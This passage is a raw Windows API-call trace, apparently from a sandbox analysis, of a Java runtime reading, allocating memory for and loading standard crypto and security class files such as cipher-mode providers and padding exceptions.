lpNumberOfBytesRead=0x208a6e0, lpOverlapped=0x0 | out: lpBuffer=0x208a760*, lpNumberOfBytesRead=0x208a6e0*=0x1e, lpOverlapped=0x0) returned 1 [0120.321] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x2aadc, lpNewFilePointer=0x208a770, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a770*=174812) returned 1 [0120.321] ReadFile (in: hFile=0x2d0, lpBuffer=0x208a880, nNumberOfBytesToRead=0x1da0, lpNumberOfBytesRead=0x208a740, lpOverlapped=0x0 | out: lpBuffer=0x208a880*, lpNumberOfBytesRead=0x208a740*=0x1da0, lpOverlapped=0x0) returned 1 [0120.324] malloc (_Size=0x37a6) returned 0x12f4d4d0 [0120.352] free (_Block=0x12f4d4d0) [0120.354] strlen (_Str="com/sun/crypto/provider/FeedbackCipher") returned 0x26 [0120.355] malloc (_Size=0x48) returned 0x12e5ffb0 [0120.355] malloc (_Size=0xa0) returned 0x12dac390 [0120.355] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3fe36, lpNewFilePointer=0x208b750, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b750*=261686) returned 1 [0120.356] ReadFile (in: hFile=0x2d0, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b720, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208b720*=0xa0, lpOverlapped=0x0) returned 1 [0120.356] malloc (_Size=0x2d) returned 0x12ef4e90 [0120.357] free (_Block=0x12ef50d0) [0120.357] free (_Block=0x12e602d0) [0120.360] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xde78, lpNewFilePointer=0x2089950, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089950*=56952) returned 1 [0120.360] ReadFile (in: hFile=0x2d0, lpBuffer=0x20899a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089920, lpOverlapped=0x0 | out: lpBuffer=0x20899a0*, lpNumberOfBytesRead=0x2089920*=0x1e, lpOverlapped=0x0) returned 1 [0120.360] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0xdec2, lpNewFilePointer=0x20899b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899b0*=57026) returned 1 [0120.360] ReadFile (in: hFile=0x2d0, lpBuffer=0x2089ac0, nNumberOfBytesToRead=0x30e, lpNumberOfBytesRead=0x2089980, lpOverlapped=0x0 | out: lpBuffer=0x2089ac0*, lpNumberOfBytesRead=0x2089980*=0x30e, lpOverlapped=0x0) returned 1 [0120.362] malloc (_Size=0x60d) returned 0x1230e4e0 [0120.368] free (_Block=0x1230e4e0) [0120.370] strlen (_Str="com/sun/crypto/provider/ElectronicCodeBook") returned 0x2a [0120.371] malloc (_Size=0x48) returned 0x12e602d0 [0120.371] malloc (_Size=0xa0) returned 0x12dabf70 [0120.371] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x4140d, lpNewFilePointer=0x208b750, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b750*=267277) returned 1 [0120.371] ReadFile (in: hFile=0x2d0, lpBuffer=0x12dabf70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b720, lpOverlapped=0x0 | out: lpBuffer=0x12dabf70*, lpNumberOfBytesRead=0x208b720*=0xa0, lpOverlapped=0x0) returned 1 [0120.371] malloc (_Size=0x31) returned 0x12ef4b10 [0120.372] free (_Block=0x12ef4e90) [0120.373] free (_Block=0x12e5ffb0) [0120.374] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1d3f2, lpNewFilePointer=0x2089950, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089950*=119794) returned 1 [0120.374] ReadFile (in: hFile=0x2d0, lpBuffer=0x20899a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089920, lpOverlapped=0x0 | out: lpBuffer=0x20899a0*, lpNumberOfBytesRead=0x2089920*=0x1e, lpOverlapped=0x0) returned 1 [0120.375] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1d440, lpNewFilePointer=0x20899b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899b0*=119872) returned 1 [0120.375] ReadFile (in: hFile=0x2d0, lpBuffer=0x2089ac0, nNumberOfBytesToRead=0x2fc, lpNumberOfBytesRead=0x2089980, lpOverlapped=0x0 | out: lpBuffer=0x2089ac0*, lpNumberOfBytesRead=0x2089980*=0x2fc, lpOverlapped=0x0) returned 1 [0120.376] malloc (_Size=0x5b6) returned 0x1230e4e0 [0120.383] free (_Block=0x1230e4e0) [0120.384] strlen (_Str="com/sun/crypto/provider/Padding") returned 0x1f [0120.387] malloc (_Size=0x48) returned 0x12e5ed90 [0120.387] malloc (_Size=0xa0) returned 0x12daaef0 [0120.387] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x40f06, lpNewFilePointer=0x208b750, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b750*=265990) returned 1 [0120.387] ReadFile (in: hFile=0x2d0, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b720, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208b720*=0xa0, lpOverlapped=0x0) returned 1 [0120.387] malloc (_Size=0x26) returned 0x12dd9bd0 [0120.388] free (_Block=0x12ef4b10) [0120.389] free (_Block=0x12e602d0) [0120.412] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1af23, lpNewFilePointer=0x2089950, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089950*=110371) returned 1 [0120.412] ReadFile (in: hFile=0x2d0, lpBuffer=0x20899a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089920, lpOverlapped=0x0 | out: lpBuffer=0x20899a0*, lpNumberOfBytesRead=0x2089920*=0x1e, lpOverlapped=0x0) returned 1 [0120.412] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x1af66, lpNewFilePointer=0x20899b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899b0*=110438) returned 1 [0120.412] ReadFile (in: hFile=0x2d0, lpBuffer=0x2089ac0, nNumberOfBytesToRead=0xcf, lpNumberOfBytesRead=0x2089980, lpOverlapped=0x0 | out: lpBuffer=0x2089ac0*, lpNumberOfBytesRead=0x2089980*=0xcf, lpOverlapped=0x0) returned 1 [0120.414] malloc (_Size=0x109) returned 0x122793e0 [0120.417] free (_Block=0x122793e0) [0120.418] strlen (_Str="javax/crypto/ShortBufferException") returned 0x21 [0120.419] strlen (_Str="javax/crypto/ShortBufferException.class") returned 0x27 [0120.419] strlen (_Str="javax/crypto/ShortBufferException.class") returned 0x27 [0120.419] malloc (_Size=0x48) returned 0x12e602d0 [0120.419] malloc (_Size=0xa0) returned 0x12daaef0 [0120.419] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1bf97, lpNewFilePointer=0x208c330, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c330*=114583) returned 1 [0120.419] ReadFile (in: hFile=0x2c8, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c300, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208c300*=0xa0, lpOverlapped=0x0) returned 1 [0120.419] malloc (_Size=0x28) returned 0x12dd9d20 [0120.420] strlen (_Str="javax/crypto/ShortBufferException.class") returned 0x27 [0120.420] strcpy (in: _Dest=0x208c4b0, _Source="javax/crypto/ShortBufferException.class" | out: _Dest="javax/crypto/ShortBufferException.class") returned="javax/crypto/ShortBufferException.class" [0120.420] malloc (_Size=0x1bf0) returned 0x12f4d4d0 [0120.420] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x15c56, lpNewFilePointer=0x208ae40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ae40*=89174) returned 1 [0120.421] ReadFile (in: hFile=0x2c8, lpBuffer=0x208ae90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ae10, lpOverlapped=0x0 | out: lpBuffer=0x208ae90*, lpNumberOfBytesRead=0x208ae10*=0x1e, lpOverlapped=0x0) returned 1 [0120.421] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x15c9b, lpNewFilePointer=0x208aea0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208aea0*=89243) returned 1 [0120.421] ReadFile (in: hFile=0x2c8, lpBuffer=0x208af90, nNumberOfBytesToRead=0x122, lpNumberOfBytesRead=0x208ae70, lpOverlapped=0x0 | out: lpBuffer=0x208af90*, lpNumberOfBytesRead=0x208ae70*=0x122, lpOverlapped=0x0) returned 1 [0120.421] malloc (_Size=0x8000) returned 0x12ef5680 [0120.422] free (_Block=0x12dda590) [0120.422] free (_Block=0x12e60b40) [0120.427] strlen (_Str="java/security/ProviderException") returned 0x1f [0120.427] strlen (_Str="java/security/ProviderException.class") returned 0x25 [0120.427] malloc (_Size=0x48) returned 0x12e60b40 [0120.427] malloc (_Size=0xa0) returned 0x12dabc00 [0120.427] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3332281, lpNewFilePointer=0x208c430, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c430*=53682817) returned 1 [0120.427] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c400, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x208c400*=0xa0, lpOverlapped=0x0) returned 1 [0120.429] malloc (_Size=0x26) returned 0x12dd9f00 [0120.430] strlen (_Str="java/security/ProviderException.class") returned 0x25 [0120.430] strcpy (in: _Dest=0x208c5b0, _Source="java/security/ProviderException.class" | out: _Dest="java/security/ProviderException.class") returned="java/security/ProviderException.class" [0120.430] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x178e4fc, lpNewFilePointer=0x208c030, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c030*=24700156) returned 1 [0120.430] ReadFile (in: hFile=0x134, lpBuffer=0x208c080, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c000, lpOverlapped=0x0 | out: lpBuffer=0x208c080*, lpNumberOfBytesRead=0x208c000*=0x1e, lpOverlapped=0x0) returned 1 [0120.430] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x178e53f, lpNewFilePointer=0x208c090, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c090*=24700223) returned 1 [0120.430] ReadFile (in: hFile=0x134, lpBuffer=0x12d540c0, nNumberOfBytesToRead=0x1bb, lpNumberOfBytesRead=0x208c060, lpOverlapped=0x0 | out: lpBuffer=0x12d540c0*, lpNumberOfBytesRead=0x208c060*=0x1bb, lpOverlapped=0x0) returned 1 [0120.431] free (_Block=0x12dda3b0) [0120.431] free (_Block=0x12e60640) [0120.438] strlen (_Str="java/security/InvalidAlgorithmParameterException") returned 0x30 [0120.438] strlen (_Str="java/security/InvalidAlgorithmParameterException.class") returned 0x36 [0120.438] malloc (_Size=0x48) returned 0x12e60640 [0120.438] malloc (_Size=0xa0) returned 0x12daaef0 [0120.438] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3331286, lpNewFilePointer=0x208c330, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c330*=53678726) returned 1 [0120.438] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c300, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208c300*=0xa0, lpOverlapped=0x0) returned 1 [0120.438] malloc (_Size=0x37) returned 0x12ef4b10 [0120.439] strlen (_Str="java/security/InvalidAlgorithmParameterException.class") returned 0x36 [0120.439] strcpy (in: _Dest=0x208c4b0, _Source="java/security/InvalidAlgorithmParameterException.class" | out: _Dest="java/security/InvalidAlgorithmParameterException.class") returned="java/security/InvalidAlgorithmParameterException.class" [0120.439] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1778c69, lpNewFilePointer=0x208bf30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf30*=24611945) returned 1 [0120.439] ReadFile (in: hFile=0x134, lpBuffer=0x208bf80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bf00, lpOverlapped=0x0 | out: lpBuffer=0x208bf80*, lpNumberOfBytesRead=0x208bf00*=0x1e, lpOverlapped=0x0) returned 1 [0120.448] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1778cbd, lpNewFilePointer=0x208bf90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf90*=24612029) returned 1 [0120.448] ReadFile (in: hFile=0x134, lpBuffer=0x12d570d0, nNumberOfBytesToRead=0x1d8, lpNumberOfBytesRead=0x208bf60, lpOverlapped=0x0 | out: lpBuffer=0x12d570d0*, lpNumberOfBytesRead=0x208bf60*=0x1d8, lpOverlapped=0x0) returned 1 [0120.449] free (_Block=0x12dd9f00) [0120.449] free (_Block=0x12e60b40) [0120.455] strlen (_Str="javax/crypto/BadPaddingException") returned 0x20 [0120.458] strlen (_Str="javax/crypto/IllegalBlockSizeException") returned 0x26 [0120.459] strlen (_Str="javax/crypto/IllegalBlockSizeException.class") returned 0x2c [0120.459] strlen (_Str="javax/crypto/IllegalBlockSizeException.class") returned 0x2c [0120.459] malloc (_Size=0x48) returned 0x12e60b40 [0120.459] malloc (_Size=0xa0) returned 0x12daace0 [0120.459] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1ae5e, lpNewFilePointer=0x208c330, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c330*=110174) returned 1 [0120.459] ReadFile (in: hFile=0x2c8, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c300, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c300*=0xa0, lpOverlapped=0x0) returned 1 [0120.459] malloc (_Size=0x2d) returned 0x12ef4c90 [0120.460] strlen (_Str="javax/crypto/IllegalBlockSizeException.class") returned 0x2c [0120.460] strcpy (in: _Dest=0x208c4b0, _Source="javax/crypto/IllegalBlockSizeException.class" | out: _Dest="javax/crypto/IllegalBlockSizeException.class") returned="javax/crypto/IllegalBlockSizeException.class" [0120.460] malloc (_Size=0x1bf0) returned 0x12f4d4d0 [0120.460] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x3661, lpNewFilePointer=0x208ae40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ae40*=13921) returned 1 [0120.460] ReadFile (in: hFile=0x2c8, lpBuffer=0x208ae90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ae10, lpOverlapped=0x0 | out: lpBuffer=0x208ae90*, lpNumberOfBytesRead=0x208ae10*=0x1e, lpOverlapped=0x0) returned 1 [0120.460] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x36ab, lpNewFilePointer=0x208aea0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208aea0*=13995) returned 1 [0120.460] ReadFile (in: hFile=0x2c8, lpBuffer=0x208af90, nNumberOfBytesToRead=0x12b, lpNumberOfBytesRead=0x208ae70, lpOverlapped=0x0 | out: lpBuffer=0x208af90*, lpNumberOfBytesRead=0x208ae70*=0x12b, lpOverlapped=0x0) returned 1 [0120.460] malloc (_Size=0x8000) returned 0x12ef5680 [0120.461] free (_Block=0x12dd9d20) [0120.461] free (_Block=0x12e602d0) [0120.465] strlen (_Str="com/sun/crypto/provider/CipherBlockChaining") returned 0x2b [0120.467] malloc (_Size=0x48) returned 0x12e602d0 [0120.467] malloc (_Size=0xa0) returned 0x12dabe10 [0120.467] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x41d5f, lpNewFilePointer=0x208b750, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b750*=269663) returned 1 [0120.467] ReadFile (in: hFile=0x2d0, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b720, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x208b720*=0xa0, lpOverlapped=0x0) returned 1 [0120.467] malloc (_Size=0x32) returned 0x12ef4cd0 [0120.469] free (_Block=0x12dd9bd0) [0120.469] free (_Block=0x12e5ed90) [0120.471] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x254d8, lpNewFilePointer=0x2089950, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089950*=152792) returned 1 [0120.471] ReadFile (in: hFile=0x2d0, lpBuffer=0x20899a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089920, lpOverlapped=0x0 | out: lpBuffer=0x20899a0*, lpNumberOfBytesRead=0x2089920*=0x1e, lpOverlapped=0x0) returned 1 [0120.471] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x25527, lpNewFilePointer=0x20899b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899b0*=152871) returned 1 [0120.472] ReadFile (in: hFile=0x2d0, lpBuffer=0x2089ac0, nNumberOfBytesToRead=0x44e, lpNumberOfBytesRead=0x2089980, lpOverlapped=0x0 | out: lpBuffer=0x2089ac0*, lpNumberOfBytesRead=0x2089980*=0x44e, lpOverlapped=0x0) returned 1 [0120.473] malloc (_Size=0x7b7) returned 0x1230ec10 [0120.477] free (_Block=0x1230ec10) [0120.479] strlen (_Str="com/sun/crypto/provider/CipherTextStealing") returned 0x2a [0120.480] malloc (_Size=0x48) returned 0x12e5f290 [0120.480] malloc (_Size=0xa0) returned 0x12dab260 [0120.480] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x439e3, lpNewFilePointer=0x208b750, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b750*=276963) returned 1 [0120.480] ReadFile (in: hFile=0x2d0, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b720, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208b720*=0xa0, lpOverlapped=0x0) returned 1 [0120.480] malloc (_Size=0x31) returned 0x12ef5190 [0120.481] free (_Block=0x12ef4cd0) [0120.482] free (_Block=0x12e602d0) [0120.491] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3da9e, lpNewFilePointer=0x2089950, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089950*=252574) returned 1 [0120.491] ReadFile (in: hFile=0x2d0, lpBuffer=0x20899a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089920, lpOverlapped=0x0 | out: lpBuffer=0x20899a0*, lpNumberOfBytesRead=0x2089920*=0x1e, lpOverlapped=0x0) returned 1 [0120.491] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3daec, lpNewFilePointer=0x20899b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899b0*=252652) returned 1 [0120.491] ReadFile (in: hFile=0x2d0, lpBuffer=0x2089ac0, nNumberOfBytesToRead=0x478, lpNumberOfBytesRead=0x2089980, lpOverlapped=0x0 | out: lpBuffer=0x2089ac0*, lpNumberOfBytesRead=0x2089980*=0x478, lpOverlapped=0x0) returned 1 [0120.492] malloc (_Size=0x7f3) returned 0x1230ec10 [0120.496] free (_Block=0x1230ec10) [0120.498] strlen (_Str="com/sun/crypto/provider/CounterMode") returned 0x23 [0120.523] malloc (_Size=0x48) returned 0x12e602d0 [0120.523] malloc (_Size=0xa0) returned 0x12dac7b0 [0120.523] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f71f, lpNewFilePointer=0x208b750, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b750*=259871) returned 1 [0120.523] ReadFile (in: hFile=0x2d0, lpBuffer=0x12dac7b0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b720, lpOverlapped=0x0 | out: lpBuffer=0x12dac7b0*, lpNumberOfBytesRead=0x208b720*=0xa0, lpOverlapped=0x0) returned 1 [0120.523] malloc (_Size=0x2a) returned 0x12ef51d0 [0120.524] free (_Block=0x12ef5190) [0120.524] free (_Block=0x12e5f290) [0120.526] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x7d31, lpNewFilePointer=0x2089950, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089950*=32049) returned 1 [0120.526] ReadFile (in: hFile=0x2d0, lpBuffer=0x20899a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089920, lpOverlapped=0x0 | out: lpBuffer=0x20899a0*, lpNumberOfBytesRead=0x2089920*=0x1e, lpOverlapped=0x0) returned 1 [0120.526] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x7d78, lpNewFilePointer=0x20899b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899b0*=32120) returned 1 [0120.526] ReadFile (in: hFile=0x2d0, lpBuffer=0x2089ac0, nNumberOfBytesToRead=0x478, lpNumberOfBytesRead=0x2089980, lpOverlapped=0x0 | out: lpBuffer=0x2089ac0*, lpNumberOfBytesRead=0x2089980*=0x478, lpOverlapped=0x0) returned 1 [0120.528] malloc (_Size=0x7f3) returned 0x1230ec10 [0120.533] free (_Block=0x1230ec10) [0120.534] strlen (_Str="com/sun/crypto/provider/GaloisCounterMode") returned 0x29 [0120.536] malloc (_Size=0x48) returned 0x12e5ed90 [0120.536] malloc (_Size=0xa0) returned 0x12dab260 [0120.536] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f537, lpNewFilePointer=0x208b750, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b750*=259383) returned 1 [0120.536] ReadFile (in: hFile=0x2d0, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b720, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208b720*=0xa0, lpOverlapped=0x0) returned 1 [0120.536] malloc (_Size=0x30) returned 0x12ef4cd0 [0120.537] free (_Block=0x12ef51d0) [0120.537] free (_Block=0x12e602d0) [0120.546] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x564d, lpNewFilePointer=0x2089950, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089950*=22093) returned 1 [0120.547] ReadFile (in: hFile=0x2d0, lpBuffer=0x20899a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089920, lpOverlapped=0x0 | out: lpBuffer=0x20899a0*, lpNumberOfBytesRead=0x2089920*=0x1e, lpOverlapped=0x0) returned 1 [0120.547] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x569a, lpNewFilePointer=0x20899b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899b0*=22170) returned 1 [0120.547] ReadFile (in: hFile=0x2d0, lpBuffer=0x2089ac0, nNumberOfBytesToRead=0x100c, lpNumberOfBytesRead=0x2089980, lpOverlapped=0x0 | out: lpBuffer=0x2089ac0*, lpNumberOfBytesRead=0x2089980*=0x100c, lpOverlapped=0x0) returned 1 [0120.549] malloc (_Size=0x1c48) returned 0x12f4ff20 [0120.558] free (_Block=0x12f4ff20) [0120.560] strlen (_Str="com/sun/crypto/provider/CipherFeedback") returned 0x26 [0120.565] malloc (_Size=0x48) returned 0x12e5fa10 [0120.565] malloc (_Size=0xa0) returned 0x12dab520 [0120.566] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x4028f, lpNewFilePointer=0x208b750, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b750*=262799) returned 1 [0120.566] ReadFile (in: hFile=0x2d0, lpBuffer=0x12dab520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b720, lpOverlapped=0x0 | out: lpBuffer=0x12dab520*, lpNumberOfBytesRead=0x208b720*=0xa0, lpOverlapped=0x0) returned 1 [0120.566] malloc (_Size=0x2d) returned 0x12ef53d0 [0120.567] free (_Block=0x12ef4cd0) [0120.567] free (_Block=0x12e5ed90) [0120.572] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x14069, lpNewFilePointer=0x2089950, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089950*=82025) returned 1 [0120.572] ReadFile (in: hFile=0x2d0, lpBuffer=0x20899a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089920, lpOverlapped=0x0 | out: lpBuffer=0x20899a0*, lpNumberOfBytesRead=0x2089920*=0x1e, lpOverlapped=0x0) returned 1 [0120.572] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x140b3, lpNewFilePointer=0x20899b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899b0*=82099) returned 1 [0120.572] ReadFile (in: hFile=0x2d0, lpBuffer=0x2089ac0, nNumberOfBytesToRead=0x54d, lpNumberOfBytesRead=0x2089980, lpOverlapped=0x0 | out: lpBuffer=0x2089ac0*, lpNumberOfBytesRead=0x2089980*=0x54d, lpOverlapped=0x0) returned 1 [0120.574] malloc (_Size=0xa28) returned 0x12f508f0 [0120.580] free (_Block=0x12f508f0) [0120.582] strlen (_Str="com/sun/crypto/provider/OutputFeedback") returned 0x26 [0120.583] malloc (_Size=0x48) returned 0x12e5f830 [0120.583] malloc (_Size=0xa0) returned 0x12dac5a0 [0120.583] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x3f776, lpNewFilePointer=0x208b750, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b750*=259958) returned 1 [0120.583] ReadFile (in: hFile=0x2d0, lpBuffer=0x12dac5a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b720, lpOverlapped=0x0 | out: lpBuffer=0x12dac5a0*, lpNumberOfBytesRead=0x208b720*=0xa0, lpOverlapped=0x0) returned 1 [0120.583] malloc (_Size=0x2d) returned 0x12ef4cd0 [0120.584] free (_Block=0x12ef53d0) [0120.584] free (_Block=0x12e5fa10) [0120.587] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x8200, lpNewFilePointer=0x2089950, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089950*=33280) returned 1 [0120.587] ReadFile (in: hFile=0x2d0, lpBuffer=0x20899a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089920, lpOverlapped=0x0 | out: lpBuffer=0x20899a0*, lpNumberOfBytesRead=0x2089920*=0x1e, lpOverlapped=0x0) returned 1 [0120.587] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x824a, lpNewFilePointer=0x20899b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899b0*=33354) returned 1 [0120.587] ReadFile (in: hFile=0x2d0, lpBuffer=0x2089ac0, nNumberOfBytesToRead=0x4d7, lpNumberOfBytesRead=0x2089980, lpOverlapped=0x0 | out: lpBuffer=0x2089ac0*, lpNumberOfBytesRead=0x2089980*=0x4d7, lpOverlapped=0x0) returned 1 [0120.589] malloc (_Size=0x8d2) returned 0x12f508f0 [0120.596] free (_Block=0x12f508f0) [0120.600] strlen (_Str="com/sun/crypto/provider/PCBC") returned 0x1c [0120.601] malloc (_Size=0x48) returned 0x12e5f100 [0120.601] malloc (_Size=0xa0) returned 0x12dab260 [0120.601] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x42f03, lpNewFilePointer=0x208b750, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b750*=274179) returned 1 [0120.601] ReadFile (in: hFile=0x2d0, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b720, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208b720*=0xa0, lpOverlapped=0x0) returned 1 [0120.601] malloc (_Size=0x23) returned 0x12ddb0a0 [0120.602] free (_Block=0x12ef4cd0) [0120.603] free (_Block=0x12e5f830) [0120.604] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x35996, lpNewFilePointer=0x2089950, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089950*=219542) returned 1 [0120.604] ReadFile (in: hFile=0x2d0, lpBuffer=0x20899a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x2089920, lpOverlapped=0x0 | out: lpBuffer=0x20899a0*, lpNumberOfBytesRead=0x2089920*=0x1e, lpOverlapped=0x0) returned 1 [0120.604] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x359d6, lpNewFilePointer=0x20899b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20899b0*=219606) returned 1 [0120.604] ReadFile (in: hFile=0x2d0, lpBuffer=0x2089ac0, nNumberOfBytesToRead=0x44a, lpNumberOfBytesRead=0x2089980, lpOverlapped=0x0 | out: lpBuffer=0x2089ac0*, lpNumberOfBytesRead=0x2089980*=0x44a, lpOverlapped=0x0) returned 1 [0120.606] malloc (_Size=0x7e3) returned 0x12f508f0 [0120.612] free (_Block=0x12f508f0) [0120.615] strlen (_Str="javax/crypto/NoSuchPaddingException") returned 0x23 [0120.616] strlen (_Str="javax/crypto/NoSuchPaddingException.class") returned 0x29 [0120.616] strlen (_Str="javax/crypto/NoSuchPaddingException.class") returned 0x29 [0120.616] malloc (_Size=0x48) returned 0x12e5ed90 [0120.616] malloc (_Size=0xa0) returned 0x12dabc00 [0120.616] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1b22b, lpNewFilePointer=0x208c430, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c430*=111147) returned 1 [0120.616] ReadFile (in: hFile=0x2c8, lpBuffer=0x12dabc00, 